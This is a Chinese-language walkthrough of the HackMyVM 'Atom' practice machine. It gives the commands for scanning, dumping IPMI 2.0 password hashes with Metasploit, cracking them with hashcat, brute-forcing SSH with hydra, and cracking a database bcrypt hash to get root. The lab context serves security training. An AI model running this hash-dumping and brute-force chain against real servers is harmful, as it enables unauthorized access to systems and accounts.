简介
靶机名称:Atom
难度:简单
靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Atom
本地环境
虚拟机:vitual box
靶场IP(Atom):192.168.56.101
跳板机IP(windows 11):192.168.56.1 192.168.190.100
渗透机IP(kali):192.168.190.131
扫描
nmap -Pn -sT -p0- 192.168.56.101 --min-rate=10000 -oA nmapscan/ports ;ports=$(grep open ./nmapscan/ports.nmap | awk -F '/' '{print $1}' | paste -sd ',');echo $ports >> nmapscan/tcp_ports;
sudo nmap -sT -sV -sC -O -p$ports 192.168.56.101 -oA nmapscan/detail
Host is up (0.0011s latency).PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA)
|_ 256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519)
25/tcp open tcpwrapped
|_smtp-commands: Couldn't establish connection on port 25
110/tcp open tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|general purpose
Running: Actiontec embedded, Linux 2.4.X
OS CPE: cpe:/h:actiontec:mi424wr-gen3i cpe:/o:linux:linux_kernel cpe:/o:linux:linux_kernel:2.4.37
OS details: Actiontec MI424WR-GEN3I WAP, DD-WRT v24-sp2 (Linux 2.4.37)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.44 seconds
感觉有点不对经,再加个udp扫描
sudo nmap -sU --min-rate=10000 -p0- 192.168.56.101/32 -oA nmapscan/udp ;ports_udp=$(grep open ./nmapscan/udp.nmap | awk -F '/' '{print $1}' | paste -sd ',');echo $ports_udp >> nmapscan/udp_ports;
sudo nmap -sU -sV -sC -p$ports_udp 192.168.56.101/32 -oA nmapscan/detail_udp
PORT STATE SERVICE VERSION
623/udp open asf-rmcp
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port623-UDP:V=7.94SVN%I=7%D=7/20%Time=669B668D%P=x86_64-pc-linux-gnu%r(
SF:ipmi-rmcp,1E,"\x06\0\xff\x07\0\0\0\0\0\0\0\0\0\x10\x81\x1cc\x20\x008\0\
SF:x01\x97\x04\x03\0\0\0\0\t");
开启了一个rmcp服务,HackTricks上有专门讲这个服务的文章
https://book.hacktricks.xyz/network-services-pentesting/623-udp-ipmi
IPMI
利用点就是623端口。IPMI是智能型平台管理接口(Intelligent Platform Management Interface)的缩写,是管理基于Intel结构的企业系统中所使用的外围设备采用的一种工业标准。这个协议在十年前爆出过 IPMI v2.0密码哈希泄露漏洞,主要是IPMI2.0协议支持RMCP+机制引入导致,远程攻击者可以将HDM响应的RAKP包中密码的哈希值抓取,从而实施离线口令猜测攻击。
我们可以使用msf的auxiliary/scanner/ipmi/ipmi_dumphashes模块进行攻击。这里记得设置自己的用户名字典和导出哈希文件,方便后续爆破。
哪怕以hashcat格式输出还是没办法直接送进hashcat去爆……稍微处理一下,把hash摘出来
cat hashes | cut -d ":" -f 2- > hash_res
这个hash不是linux的hash值,是IPMI2的特有格式hash,能在hashcat中搜到。
hashcat -a 0 -m 7300 ./hash_res $HVV_Tool/8_dict/kali.txt --outfile-format 2 --force --show > hash_res
爆出来结果为
cukorborso
honda
TWEETY1
290992
jesus06
2468
122987
milo123
dezzy
tripod
chatroom
evan
071590
081704
number17
numberone
billandben
emeralds
trick1
241107
mackenzie2
jiggaman
phones
515253
jaffa1
darell
djones
batman!
090506
kittyboo
me4life
castillo1
sexymoma
10101979
poynter
120691
最后和用户名进行合并即可
cat hashes | grep -Po "(?= ).+?(?=:)" | sed "s/^[ \t]*//;s/[ \t]*$//" > username; paste -d: username ./hash_res > ssh_dic
ssh爆破
使用hydra爆破即可
hydra -t 8 -s 22 -C ./ssh_dic 192.168.56.101 ssh
得到账密为onida:jiggaman
连接,得到user.txt
提权
有一个网站,端口监听回环地址。本来我还打算用ssh开个转发,然后发现数据库就在旁边。
脱下来,直接找到账密
hashcat爆破
hashcat -a 0 -m 3200 ./hash2 $HVV_Tool/8_dict/kali.txt --force
madison
su root,输入该密码,提权成功
结束
